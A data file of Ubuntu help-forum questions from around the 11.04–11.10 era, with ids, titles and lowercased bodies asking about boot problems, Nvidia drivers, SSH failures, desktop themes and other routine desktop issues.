66306	boot problem in dual-boot imac	i know there are too many booting problem posts in geek forums , but none of them could help me so i decided to ask here . i have been using my imac with ubuntu 10.04 for almost 1 year . it was perfect and i had no problem , until i decided to make a triple-boot with windows7 . i have repartitioned my drive and and tried to install windows7 . it failed . but it also damaged my system . now i am not able to boot ubuntu . for 3 days i have been trying all the things that are written on the forums , but i really could n't solve the problem . first , i got a frozen tux logo when i try to boot ubuntu from refit . then i boot with gparted and deleted the ntfs partition , reformatted it to ext3 and merging it to my ubuntu partition ( sda4 ) i hoped getting everything same as 3 days before could solve the problem . but it could n't . now i have a gray windows like icon on refit instead of tux logo and it says boot legacy os from hd . if i try to boot it , it frozen like tux logo , but when i try to boot from apple boot thing ( with holding option key ) it says `` missing operating system , no bootable device blabla '' i have tried synchronize the tables , didnt work . i have also tried restoring mbr and reinstalling grub with boot-repair-disk with every combo of options , ( reinstalled grub on sda and sda4 , tried to restore mbr on efi , mac and linux parts ) they really do n't work . i also boot with live ubuntu cd , and tried to setup grub from terminal . but i failed again . please show me another way to fix this . or at least tell me what is the reason that i ca n't boot ubuntu . ( i can boot macos ) i have backed up my personal files with live cd , i will just reinstall ubuntu if i ca n't fix this , but i 'm afraid of ending up with the same result . sorry for the long post , i thought giving the details can help you guys determine the problem . thanks .
66308	how can i backup my apps , ppas , firefox bookmarks , fonts , icon sets , webcam drivers before a clean install ?	so i 've fine-tuned my natty with different icon sets , themes , fonts from sites i do n't remember now . and there are these apps , ppas which are very difficult to find , add again . so how do i backup everything and restore ? how different will an upgrade be from a clean install ?
66310	ubuntuone-control-panel-gtk : depends : ubuntuone-installer but it is not installable	i 'm trying to install ubuntuone-control-panel-gtk , and i got the following message : $ sudo apt-get install ubuntuone-control-panel-gtk reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : ubuntuone-control-panel-gtk : depends : ubuntuone-installer but it is not installable e : broken packages the part depends : ubuntuone-installer but it is not installable is it because i 'm using ubuntu 10.10 ? by the way , packages in the ppa doesnt mention ubuntuone-installer . any idea why i ca n't install the ubuntuone-control-panel-gtk here ?
66313	is my hard disk doomed ?	my computer shut down suddenly and refuses to boot now . i started it with an ubuntu live cd and it reported that a hard disk failure is imminent . the error reported by smart : reallocated sector count : the threshold value is 140 but the value is 504 . what does this mean ? what should i do next ? i 'm backing up all the important data to an external hard disk as i write this .
66315	how to reflow text in a terminal when you resize ?	i 'm interested in making my gnome terminal reflow text when resizing the window , i.e. , if there is a line break in a long terminal output and i resize the window the text will reflow onto onto line instead of continuing to break at the same spot . the terminal on mac os does this , so it is possible . but perhaps not with gnome-terminal . does anyone know a way to accomplish this or an alternate terminal i can use on ubuntu that supports this functionality ?
66318	bash script and zenity progress	i have this cmds : ( youtube-dl http : //www.youtube.com/watch ? v=hhoewflkqu0 ) | zenity -- progress -- width=400 -- height=100 -- title= '' scaricamento '' -- text `` scaricamento in corso ... '' -- auto-close -- pulsate but i have a problem : if i click on `` abort '' or i press the `` x '' button nothing happens ... how can i exit the script and all the processes it has started ? this is the full script : ifs= $ '\n' down_path=/home/ $ user/scaricati you_url=`zenity -- entry -- text `` inserisci url youtube '' -- title `` url '' ` file=`youtube-dl -- get-filename $ you_url` cd $ down_path ( youtube-dl $ you_url ) | zenity -- progress -- width=400 -- height=100 -- title= '' scaricamento '' -- text `` scaricamento in corso ... '' -- auto-close -- pulsate song_name=`zenity -- entry -- text `` inserisci titolo canzone e autore '' -- title `` info canzone '' ` ( ffmpeg -i $ down_path/ $ file $ song_name.mp3 -ab 256k 2 > & 1 ) | zenity -- progress -- width=400 -- height=100 -- title= '' conversione '' -- text `` conversione in corso ... '' -- auto-close -- pulsate rm -f $ down_path/ $ file unset ifs notify-send `` conversione terminata '' `` il file : $ song_name.mp3 si trova nella cartella : /home/ $ user/scaricati ti amo piccola mia non dimenticarlo mai exit 0
66320	how to change desktop font size	how to change desktop font size ? i tried compiz-settings-manager and gnome-tweak-tool
66321	ubuntu does n't boot when selecting linux 3.0	i just upgraded to 11.10 from the update manager . it does n't seem to want to boot when using the 3.0 kernel option but does with the 2.6 kernel option . it gets stuck at the final dot of the ubuntu bootsplash .
66322	how can i change the desktop folder path ?	i had some trobles upgrading to 11.10 , and had to create a new user and copy some files to my old user to work . but now ubuntu dont find my desktop folder . i need to change the path , so where can i change it ? thanks .
66323	`` error : null '' when trying to log into ubuntu one	i just installed the ubuntu one app . when i log in , i keep getting the message `` error : null '' and it does n't show any shared files on the desktop . i am using the samsung galaxy s .
66327	can not double click indicators ( notify bar ) to launch some applications or open their main window	i 've recently updated to oneiric . i 've noticed though that some of the indicators that are supposed to open a window when you double click it no longer works . in fact you can only left click and or right click to open a menu . you should to be able to double click the icon to open up the programs main window . now i can no longer access some of the stuff easily that i used to before . example keepassx . normally when you run keepassx it 's hidden and minimized to the indicator ( notify bar ) . you had to double click on it and type the unlock code to get the full window . now i ca n't even do that as the only options are the global unlock and exit from the menu that pops up . there are other indicators that do the same thing . the skype indicator used to open the window when you double clicked it . now you have to select 'activate '' from the menu window . i do n't know why this was changed or is a bug . i 'm hoping there is a way to fix this problem as there are several indicators and applications i use that use indicators that no longer work now . again i only have access to their menu 's but can no longer double-click . any help would be great
66328	how do i install the latest nvidia drivers from the .run file ?	this is what i am trying to do . i downloaded the latest driver for my vga from http : //www.nvidia.com . the installation needs the x11 to be shut down , so i log out of my account , then press ctrl+alt+f1 , then log in with my username and password , then run the command sh nvidia-linux-x86_64-285.05.09.run in every possible way , i have even tried chmoding the package with 777 permissions , but still i 'm getting the sh : ca n't open nvidia-linux-x86_64-285.05.09.run error . any help would be greatly appreciated .
66333	how to customize the appearance of the address view in kaddressbook ?	i am impaired by my eyesight and have to set the fonts quite big to work with kde . kaddressbook seems to ignore the settings so that i have the contact list with big letters to choose a contact but i ca n't see the contact infomation to the right . because it 's so small . where to change the adress preview window ? ( this has always been ok , but now after kde 4.7.1 it 's a mess - i do n't understand why there is always regression with every new version ... ! )
66339	how do i solve this nvidia driver download error ?	i ca n't enable or download any nvidia drivers . in the image below , you can see i am offered four options . selecting to enable any of them results in the error message shown : here 's some of what is in /var/log/jockey.log : 2011-10-15 03:01:10,300 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb69126cc > about hardwareid ( ' modalias ' , 'usb : v0557p2221d0100dc00dsc00dp00ic03isc01ip02 ' ) 2011-10-15 03:01:10,300 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb69126cc > about hardwareid ( ' modalias ' , 'pci : v00008086d000027b8sv00001043sd00008179bc06sc01i00 ' ) 2011-10-15 03:01:10,300 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb69126cc > about hardwareid ( ' modalias ' , 'platform : reg-dummy ' ) 2011-10-15 03:01:10,300 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb69126cc > about hardwareid ( ' modalias ' , 'serio : ty01pr00id00ex00 ' ) 2011-10-15 03:01:10,300 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb69126cc > about hardwareid ( ' modalias ' , 'usb : v046dp08d9d0100dc00dsc00dp00ic01isc02ip00 ' ) 2011-10-15 03:01:10,300 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb69126cc > about hardwareid ( ' modalias ' , 'pci : v00008086d000027c0sv00001043sd00008179bc01sc01i8f ' ) 2011-10-15 03:01:10,300 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb69126cc > about hardwareid ( ' modalias ' , 'input : b0000v0000p0000e0000-e0,5 , kramlsfw2 , ' ) 2011-10-15 03:01:10,300 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb69126cc > about hardwareid ( ' modalias ' , 'acpi : pnp0103 : ' ) 2011-10-15 03:01:20,475 warning : modinfo for module nvidia_current_updates failed : error : modinfo : could not find module nvidia_cur rent_updates 2011-10-15 03:01:20,475 warning : /sys/module/nvidia_current_updates/drivers does not exist , can not rebind nvidia_current_updates dr iver 2011-10-15 03:01:42,270 debug : shutting down i have a dual monitor set up , but because of this problem , i can only get one monitor to work . how do i make it so i can actually use one of the nvidia drivers and have complete graphics ability ? update : if i run nvidia-config and generate an xorg.conf file , then my system wo n't boot . update 2 : this problem can also occur on ubuntu 12.04 . luckily , the provided solution also works there .
66340	graphics are slower in 11.10 after upgrade	i just upgraded from 11.04 to 11.10 and i noticed that graphics are slower . i had the nvidia driver downloaded from their website in 11.04 . after the upgrade the pc would n't actually boot in kernel 3.0 , so i went to 2.x.38 and installed the nvidia driver from the repos . after this change , 3.0 was working but , as i said , with some regressions.openarena , for example , was slower . plus , i noticed in openarena tearing and in ff too . it may be a system wide thing though , i do n't know . so my question is ... how can i verify if the driver is installed correct ? but if i understood the problem incorrect , please help me out identifying it !
66343	monodevelop google api gdata assembly not found	i 'd like to create an application that can communicate with my spreadsheets with google documents . i 've installed monodevelop 2.6 and i 've libgdata1.7-cil ( google 's api for c # ) installed on my computer . now , when i start a new project with monodevelop , i 'm seeking for a reference assembly that would look like google.gdata or something like that , but i just ca n't find it ... should i seek it manually inside my computer or am i missing something ? thank you for your tips ...
66345	removing second/unity/nautilus bar behind gnome 3 top bar	when applying themes that have transparency set on the top bar ( gnome shell/gnome 3 ) , there is a unity or nautilus bar behind it that makes everything look like a mess . that bar contains menu items like : file edit , about , help once i did the help button , when gnome 3 did n't start properly ( so i was able to access this menu ) , and it said `` nautilus '' . i 've seen that ppl around the net have this problem but does anyone here have a solution ?
66347	how to unbind alt in lubuntu ( lxde ) ?	in ubuntu when i hovered my mouse over virtualbox and held the alt key , it was sent to virtualbox os . however , in lubuntu ( lxde ) , when i hold the alt key , it wants to switch between desktops and i ca n't use the alt key inside virtualbox . how do i disable/unbind the alt in lxde , so it works in the virtualbox window ?
66349	purple screen on boot	i 've downloaded ubuntu 11.10 and tried to dualboot it with windows 7 , installation proccess went forward without problems , grub2 recognized my win 7 boot loader and everything looked fine ! i wanted to boot into my fresh ubuntu install but before the splash screen appeared a sold purple screen was shown with no text . i waited about 10 mins but to no avail , then i restarted and it happened again , i went into kernel editing in grub and deleted thoese 2 words quiet and another one which i forgot ! i replaced it with vesa and some other stuff but again it did n't work , i tried wubi and this happened again . the only way to run ubuntu on my machine is inside a virtual machine which does n't work as a solution for me because i do n't want to test ubuntu , i want to use it ! some say it 's a problem with my gpu . my gpu is a radeon hd 6950 .
66352	windows 7 reboots without warning after installing ubuntu	now , this is kind of complicated to explain . both work just fine . dual booting is done as intended , they both boot normally . but , if i boot into ubuntu and use it for any significant period of time , my next reboot into windows will hard-reboot about 10 seconds after the os `` welcome '' screen appears . after this , i can boot into windows normally and use it as long as i want , as long as i do n't boot back into ubuntu again , or this will occur again . this only happens with ubuntu based distros , like linux mint or xubuntu . i tried with debian , and it does n't happen . it does n't happen with < 11.04 , either .
66354	how do i permanently change the brightness of the screen ?	on the previous versions the default screen brightness was perfect for me but on 11.10 the default brightness is killing my eye . i have changed the brightness like this level but after restarting and every login/logout it returns to default 100 % .
66355	who changed my grub theme to debian ?	during these days i 've upgraded from natty to oneiric and i 've also installed the gnome shell , just to give it a try . i noticed this morning that grub theme is showing a debian logo and i did n't request it ! which package is known to set the grub theme to debian one ? i did n't install anything from external repositories so it should be an official ubuntu package , but who exactly ? do you know how to switch back to ubuntu grub theme ? thanks for your help !
66356	gdk gtk warnings and errors from the command line	in the newest version of ubuntu ( 11.10 ) when i run from the command line gtk complains loudly ( over several lines ) each time a window is opened . the problem is clearly with the theme - if i change the default from ambiance to high-contrast this goes away . some examples : travis @ hydrogen : ~ $ emacs foo.txt ( emacs:1550 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( emacs:1550 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( emacs:1550 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( emacs:1550 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( emacs:1550 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( emacs:1550 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( emacs:1550 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( emacs:1550 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , travis @ hydrogen : ~ $ evince test.pdf ( evince:1566 ) : glib-gobject-warning ** : g_object_set_valist : construct property `` enable-gestures '' for object `evview ' ca n't be set after construction ( evince:1566 ) : gdk-critical ** : gdk_window_get_pointer : assertion `gdk_is_window ( window ) ' failed ( evince:1566 ) : gdk-critical ** : gdk_window_get_pointer : assertion `gdk_is_window ( window ) ' failed ( evince:1566 ) : gdk-critical ** : gdk_window_get_pointer : assertion `gdk_is_window ( window ) ' failed i like the themes and i do n't want to part with them . how can i fix the command line verbosity from gtk ? i can simply hack the command line to filter out these messages , but i really do n't like that idea . possibly related from a previous version : how to get rid of odd error line ...
66357	anything to fix if accidentally logged out during installation ?	i started installing oneiric , with whatever option keeps your files but upgrades the os ( do n't remember what it 's called any more ) . it got to the part when it is running apt-clone to restore previously installed packages , but during the middle of that , i accidentally logged out of the livecd session . is there anything that the installer does after that that i need to do manually now ? is it fine ? should i just reinstall over it ?
66360	how to use gnome3 with compiz	i choose in lightdm gnome-classic session . i launched gnome3 with the classic style ( the fallback ) . but compiz does n't work . if i execute compiz -- replace compiz starts working . but how enable automatic loading of compiz ? if i add compiz to autostart in gnome starting takes lot of time .
66362	will i upgrade to ubuntu if i use dist-upgrade in xubuntu ?	will update-manager -d in xubuntu 11.04 install standard ubuntu ( with unity and all ) or will it just upgrade to xubuntu 11.10 ? if anyone did so , did you have experience concerning stability or complete breakdown after an upgrade ?
66363	no sound plays from headphones on an msi wind u100 netbook	just performed a fresh install and sound plays from the speakers but not from the headphones . no sound at all . if i pull the jack out , then push it in slightly , it works but sound plays from the speakers also . lspci | grep -i audio 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 02 ) i am using an msi wind u100 netbook . f
66364	frozen synapse started crashing with a `` unable to initialize opengl '' error after upgrade	i just played frozen synapse 2 days ago using ubuntu 11.04 . now with a clean upgrade of 11.10 , i can not play the game anymore . when i run the game in terminal i get this error : alert : error unable to initialize opengl . ( error : failed loading libgl.so.1 ) exiting what could be the problem ? i 'm using intel graphics adapter by the way . the one that intel corei3 comes in stock in laptops .
66365	ubuntu does n't automatically starts in graphical mode after upgrade to 11.10	i updated from ubuntu 11.04 to 11.10 today . instead of using update manager , i upgraded using sudo do-release-upgrade command in terminal . however , an blackout causes the computer to switch off and the installation is terminated halfway accidently . after i switched on the computer , the ubuntu 11.04 wo n't start it 's gui . so , i used ctrl+alt+f1 , logged in and used sudo do-release upgrade again to resume the upgrade . after the upgrade , the computer restarted , after choosing ubuntu 11.10 from grub , the screen goes black , no bootloader or anything . here is the screenshot of the screen after something appears.. after this appears , i used ctrl+alt+f1 again , logged in and used startx command . ubuntu is back to normal . when i restarted again , it goes back to tty1 . i have to use sudo reboot to get restart again , however , this time same thing happens and ubuntu 11.10 wo n't start gui automatically . how do i fix this ?
66367	how to set up a home network	i have been using windows 7 on both my home pc and my laptop and have been using the homegroup feature to share files between machines . could someone please tell me how to achieve this using ubuntu 11.10 in the easiest way possible ? via a graphical interface would be preferred .
66369	ssh refusing all connections after upgrade to 11.10	i upgraded from 11.04 to 11.10 and upon completion found that i could no longer ssh into other computers that i routinely do so . there are several things i 've checked : kerberos authentication is working fine , that 's not the problem . i tried restarting and reinstalling ssh , but neither helped . i tried copying over all ssh related files from my laptop ( with a properly function ssh in 11.04 ) and replace what is on my 11.10 malfunctioning os , but that did not help . i tried deleting the .ssh/known_hosts file . on my next attempt , i received the normal message about connecting somewhere for the first time , but was still refused a connection . jason : ~ $ /usr/sbin/sshd -ddd debug2 : load_server_config : filename /etc/ssh/sshd_config debug2 : load_server_config : done config len = 682 debug2 : parse_server_config : config /etc/ssh/sshd_config len 682 debug3 : /etc/ssh/sshd_config:5 setting port 22 debug3 : /etc/ssh/sshd_config:9 setting protocol 2 debug3 : /etc/ssh/sshd_config:11 setting hostkey /etc/ssh/ssh_host_rsa_key debug3 : /etc/ssh/sshd_config:12 setting hostkey /etc/ssh/ssh_host_dsa_key debug3 : /etc/ssh/sshd_config:13 setting hostkey /etc/ssh/ssh_host_ecdsa_key debug3 : /etc/ssh/sshd_config:15 setting useprivilegeseparation yes debug3 : /etc/ssh/sshd_config:18 setting keyregenerationinterval 3600 debug3 : /etc/ssh/sshd_config:19 setting serverkeybits 768 debug3 : /etc/ssh/sshd_config:22 setting syslogfacility auth debug3 : /etc/ssh/sshd_config:23 setting loglevel info debug3 : /etc/ssh/sshd_config:26 setting logingracetime 120 debug3 : /etc/ssh/sshd_config:27 setting permitrootlogin no debug3 : /etc/ssh/sshd_config:28 setting strictmodes yes debug3 : /etc/ssh/sshd_config:30 setting rsaauthentication yes debug3 : /etc/ssh/sshd_config:31 setting pubkeyauthentication yes debug3 : /etc/ssh/sshd_config:35 setting ignorerhosts yes debug3 : /etc/ssh/sshd_config:37 setting rhostsrsaauthentication no debug3 : /etc/ssh/sshd_config:39 setting hostbasedauthentication no debug3 : /etc/ssh/sshd_config:44 setting permitemptypasswords no debug3 : /etc/ssh/sshd_config:48 setting challengeresponseauthentication no debug3 : /etc/ssh/sshd_config:63 setting x11forwarding yes debug3 : /etc/ssh/sshd_config:64 setting x11displayoffset 10 debug3 : /etc/ssh/sshd_config:65 setting printmotd no debug3 : /etc/ssh/sshd_config:66 setting printlastlog yes debug3 : /etc/ssh/sshd_config:67 setting tcpkeepalive yes debug3 : /etc/ssh/sshd_config:74 setting acceptenv lang lc_* debug3 : /etc/ssh/sshd_config:76 setting subsystem sftp /usr/lib/openssh/sftp-server debug3 : /etc/ssh/sshd_config:87 setting usepam yes debug1 : sshd version openssh_5.8p1 debian-7ubuntu1 debug3 : incorrect rsa1 identifier debug1 : read pem private key done : type rsa debug1 : checking blacklist file /usr/share/ssh/blacklist.rsa-2048 debug1 : checking blacklist file /etc/ssh/blacklist.rsa-2048 debug1 : private host key : # 0 type 1 rsa debug3 : incorrect rsa1 identifier debug1 : read pem private key done : type dsa debug1 : checking blacklist file /usr/share/ssh/blacklist.dsa-1024 debug1 : checking blacklist file /etc/ssh/blacklist.dsa-1024 debug1 : private host key : # 1 type 2 dsa debug3 : incorrect rsa1 identifier debug1 : read pem private key done : type ecdsa debug1 : checking blacklist file /usr/share/ssh/blacklist.ecdsa-256 debug1 : checking blacklist file /etc/ssh/blacklist.ecdsa-256 debug1 : private host key : # 2 type 3 ecdsa debug1 : setgroups ( ) failed : operation not permitted debug1 : rexec_argv [ 0 ] ='/usr/sbin/sshd ' debug1 : rexec_argv [ 1 ] ='-ddd ' debug3 : oom_adjust_setup set /proc/self/oom_score_adj from 0 to -1000 debug2 : fd 3 setting o_nonblock debug1 : bind to port 22 on 0.0.0.0 . bind to port 22 on 0.0.0.0 failed : permission denied . debug2 : fd 3 setting o_nonblock debug3 : sock_set_v6only : set socket 3 ipv6_v6only debug1 : bind to port 22 on : : . bind to port 22 on : : failed : permission denied . can not bind any address . maybe the problem is in that readout , but i 'm not familiar enough with this output to know . my laptop which still has ubuntu 11.04 still can successfully log into the computers i need to , so the problem is definitely related to the upgrade of my desktop to 11.10 . ========================================================================= [ edit : ] i think i figures something out : if i do a `` ssh -vv name @ computer.org.com '' ( the computer i 'm trying to log into ) , towards the end of the output i get : jason nett 11:06:38 pm debug1 : authentications that can continue : gssapi-keyex , gssapi-with-mic , keyboard-interactive debug1 : next authentication method : gssapi-keyex debug1 : no valid key exchange context debug2 : we did not send a packet , disable method debug1 : next authentication method : gssapi-with-mic debug2 : we sent a gssapi-with-mic packet , wait for reply debug1 : authentication succeeded ( gssapi-with-mic ) . authenticated to computer.org.com ( [ xxx.xxx.xxx.xxx ] : xx ) . notice that `` gssapi-with-mic '' is in the list of `` authentications that can continue '' and is the one that succeeded . when i try on the machine that lost it 's ability to ssh , this output is : debug1 : authentications that can continue : gssapi-keyex , gssapi-with-mic , keyboard-interactive debug1 : next authentication method : keyboard-interactive debug2 : userauth_kbdint debug2 : we sent a keyboard-interactive packet , wait for reply debug1 : authentications that can continue : gssapi-keyex , gssapi-with-mic , keyboard-interactive debug2 : we did not send a packet , disable method debug1 : no more authentication methods to try . permission denied ( gssapi-keyex , gssapi-with-mic , keyboard-interactive ) . so on this machine , `` gssapi-keyex '' and `` gssapi-with-mic '' are never attempted -- according to the verbose output -- and only `` keyboard-interactive '' is attempted . from my online searches , i gather that gssapi-with-mic has something to do with communicating my kerberos authentication , but i 'm not quite sure where to go from here , at the moment . hopefully this extra info can help us rectify the issue quickly .
66370	x11 does n't start after clean 11.10 install ( dell e6500 , nvidia , 8gb ram , i386 )	i just installed ubuntu 11.10 , i386 on my dell latitude e6500 . the installation was fine , but then x11 did n't start . /var/log/x.0.org says : ( ee ) failed to load module `` nv '' ( module does not exist , 0 ) ... ( ee ) nvidia ( 0 ) : failed to load nvidia kernel module ! i installed nvidia-current apt-get install nvidia-current but no luck . just in case : 10.10 works just fine . thanks !
66371	gnome-terminal keeps the menubar even when the profile is configured to hide it	i am running gnome classic on 11.10 and even though i have configured the gnome-terminal profile to hide the menu bar it shows it . even when i open the gnome-terminal -- hide-menubar it shows the menu bar . any idea how to resolve that ? i even used gconf-editor to see if there is a problem with the profile but it has the parameter to show the menubar by default in false .
66372	gui apps always generate xlib : extension `` randr '' missing on display `` :0.0 '' .	for a long time , i 've had the following show up every time i launch a gui application from the terminal : xlib : extension `` randr '' missing on display `` :0.0 '' . i 've had this forever and i 've also had some odd edge issues forever ( unity not working particularly well , for instance ) so i 'm wondering if it 's indicative of a greater issue with my setup . what might cause this , and at the very least , how might i suppress it ? i 'm running 11.10 and this is what lspci says about my video card : 01:00.0 vga compatible controller : nvidia corporation g98 [ geforce 8400 gs ] ( rev a1 )
66377	flash stopped working on chrome	i upgraded my system to ocelot from narwhal and flash stopped working on chrome , the plugin is installed on the software center , i removed it and installed it thrice but still , no flash support on chrome .
66380	no scrolling on my vaio vpcef3e1e notebook	i have a big problem with my sony vaio vpcef3e1e touch-pad . i ca n't scroll . since i 'm a new ubuntu user , i have no idea where i can find an answer . i have found no answer in the mouse options either .
66386	ubuntu 11.04 does n't boot anymore . nore from hdd , nore from live usb . win xp boots fine	booting normally , it drops my in a small shell ... something like initframs , i 'm not quite sure . booting in recovery mode dropes me to the same shell but constantly writes out error messages . something that had to do with a bad sector on /dev/sdb . so i said ... ok. a fresh live usb flash would do the trick . i can run hdd utilities from it to repair things . wrong . the live flash stumbled on the same error ( seemingly ) . after these errors the ubuntu logo appeared with the blinking dots that never finished blinking . the flash 's light did n't indicate any activity on the data channels . flash works fine on another pc though .
66391	how to install driver for rosewill rnx-n150ube ?	link to driver i am a super noob , so super simple walkthrough would be appreciated
66392	do i need the alternate installer to install on a box with existing raid 0 ?	i have an existing machine with three drives , two of which are joined in a raid 0 ; on my old distro , this was mounted at /home when i went to install oneiric , it recognized each drive separately ; the main drive is no problem , but there was no way to note that that the other two drives were raided together . from what i 've read , the alternate install is required for an install including raided drives . do i need this , even though it 's not going to house the root filesystem ? is it a particular hassle to do this after install on ubuntu ?
66395	trying to change the color scheme through the css file , but no permission	i have been trying to switch out the orange color scheme in ubuntu 11.10 through the css files . i know where the files are and what i need to change in them , but every time i try to save it it says that i can not since i do n't have permission . is there a way to get permission ? i am using bluefish editor fyi .
66396	what 's the absolute path of an icon declared in a .desktop file ?	in a .desktop file you can declare an icon , however it 's not clear how this translates to an icon on disk : icon=eric where on the filesystem can i find this icon ? related to this question : how do i add an icon to an app that does n't have one ?
66398	how to modify the system default login background image ?	following this , i added a couple of modified background images to the backgrounds collection . now , i want to select a different background for the login screen . how do i do that ? update : just tried david 's solution on a fresh installation of ubuntu 11.10 . it seems like the file : /usr/share/applications/gnome-appearance-properties.desktop does no longer exist . any idea on what i can use instead ?
66399	nautilus crashing when running gksu nautilus	when i run gksu nautilus from the terminal , after entering my password , nautilus opens to the root folder as usual , but then crashes when i try to navigate within the file system and i get this error in terminal : ( nautilus:7160 ) : debug : syncdaemon not running , waiting for it to start in nameownerchanged any ideas ? i am running a fresh install of ubuntu 11.10 oeniric ocelot . i also receive this error : ( nautilus:7947 ) : gconf-critical ** : gconf_client_get : assertion `gconf_is_client ( client ) ' failed
66400	how do i make unity 3d work on my dell d2400 desktop ?	on my 11.10-running desktop , unity 2d seems to work , unity 3d does not . i ran a test , and here is what i got . not software rendered : no not blacklisted : no glx fbconfig : yes glx texture from pixmap : no gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : no so , since i do n't know much about what this means , can someone tell me what they mean , and how i can fix it ( if i can ) . i plan on replacing this computer ( which is seven years old ) next year , but in the meantime , can i have some help ? also , with those results , can i run gnome shell ? ps : the code for the test was /usr/lib/nux/unity_support_test -p
66414	how to add panel applets to classic gnome panel ?	because of unity 's inability to use any gnome panel applets , i changed back to the classic gnome panel . however , even in the classic interface , i 'm finding i ca n't right-click the gnome panel to change anything . how do you add applets to the gnome panel in the classic interface ?
66418	microphone input noisy	my mic - although fully functioning - always records mostly screeching noises , while my voice can only be heard in the background . i have to admit , that i tried different distributions and everywhere there was the same problem - yet some time the mic worked properly . in order to make internet telephoning tolerable for my conversatonal partners , i would like to fix it . i already checked this site and tried a solution adding a line to /etc/modprobe.d/alsa-base.conf , but this did n't work . i have an acer travelmate 5190 with a rv625 audio device - i use ubuntu 11.10 64 bit . thx in advance - ewald edit : the problem is not with the microphone , the same effects occur with a headset , audio feed can also be ruled out because there was no source of noise during the recording
66420	is classic mode gone from 11.10 ?	i am trying to turn off unity ( or see if you can go back to a classic ubuntu desktop ) in 11.10 . so far , i can not find a way to turn it off . there is a regular , and 2d option at login time , and that 's it . both options take you to a unity desktop .
66421	is there an ask ubuntu lens available for 11.10 ?	i have been searching around for an ask ubuntu lens recently that 's compatible with 11.10 . could anybody give me a hand and either show me how to get one , or tell me when one comes out ?
66428	forcing fullscreen across dual-monitors	i write a lot of code , and i prefer my editor window ( emacs ) to be 100 % of all my screen space . ( ideally , not even title bar , but not going for that yet ... ) . i usually stretch it out , but in 11.10 ( gnome ) , there 's this really frustrating auto-maximize to a given monitor 'feature ' . i 've tried forcing the size to be 2880x900 and setting the window to be non-maximizable in ccsm , but no go .
66431	how do i configure lightdm to work with xdmcp ?	does anyone have a set up to make xdmpc work with lightdm on 11.10 . using xdmpc+gdm was easy as pie , worked great . after the upgrade to 11.10 with the switch to lightdm i ca n't figure out how to get it to work . where is the documentation that explains the custom lightdm.conf file ? any help appreciated ...
66433	can not install spotify gnome support/dependency problems	error is as follows : the following packages have unmet dependencies . spotify-client-gnome-support : depends : spotify-client-qt ( = 1:0.5.2.84.g6d797eb-1 ) but 1:0.6.2.291.gcccc1f5.116-1 is to be installed e : broken packages basically spotify-client-qt is too recent under both my ubuntu/xubuntu installations . i can not force version so as to regress under synaptic either . can i get an old copy from somewhere ? or will spotify be updated any time soon ?
66435	how to navigate and launch installed applications ?	how do you navigate and select via keyboard installed applications in unity ? previously , i added a keyboard shortcut to open the `` applications '' menu , and then i could quickly navigate to whatever application i need to open . i can find no similar functionality in unity . i ca n't even find a listing of installed apps . the only way i can find to launch an app is to click that `` ubuntu '' logo box in the upper-right hand corner , and then type in the applications name to search for it , which is a little cumbersome .
66445	dimming the backlight is irreversible on a samsung q210 notebook , what do i do ?	i 'm new to the community , although i have been using ubuntu since 2010 . i have a samsung q210 notebook ; specs : intel® core™2 duo cpu p8400 @ 2.26ghz × 2 4 gigs ram nvidia 9200m gs ( although system information in ubuntu does n't know ) 194 gb hd os : ubuntu 11.10 kernel is 3.0.0-12-generic-pae although samsung seems to be infamous for problems with ubuntu , after upgrading to oneiric , finally the fn brightness buttons are recognized . the only problem is , after dimming the backlight for a fixed amount of steps ( 3 or 4 , i dare not count now because that would mean rebooting because i ca n't see anything ) , the display goes completely dark and using the fn buttons to brighten the backlight does not work anymore ( before reaching that threshold , going brighter after dimming works ) . now what do i do ? file a bug report ? if not , what then ? if yes , how ? not sure . guess i should ask here first .
66446	how to put in rhythmbox in the sound menu ?	i uninstalled the banshee , rhythmbox and installed , but it does not appear in the sound menu , i open rhytmbox and put on some music and close the rhytmbox and the music keeps playing , but in the sound menu of ubuntu does not appear anything rhytmbox .
66447	how do i install software using the ubuntu software center ?	the title says it all . i 'd like to know how i can install software - an example is the chromium web browser .
66454	how do i install glippy ?	i just installed the brand new 11.10 and apparently the ppa for glippy do n't work with oneiric . maybe with the upgrade glippy can still be operating with you ? thnx
66455	confirm ssh login and log file	is there any way that stop ssh logins without confirmation ? when anyone wants to login to my computer , i am prompted by ssh to confirm the login before it is successful . in our university lab , all computers have common usename and passwords so that anyone , students mainly , can access the computers . i need a way so that that can ssh prevent logins until i confirm . similarly , is there a log file i can use so that i know if anyone is accessing my computer ?
66456	after upgrading to 11.10 , when pressing ctrl+f , xterm is popping up	yesterday i upgraded from 11.04 to 11.10 . i ca n't use ctrl+f key combination anymore . it is remap to launch xterm . does anyone know how to remove this mapping ? i have never mapped to this key combination and not sure how this came about . thanks !
66459	how can i add a second time zone ?	in 11.04 i had a second time zone in the clock/date dropdown . in 11.10 there seems to be no obvious way to do this , is there one ?
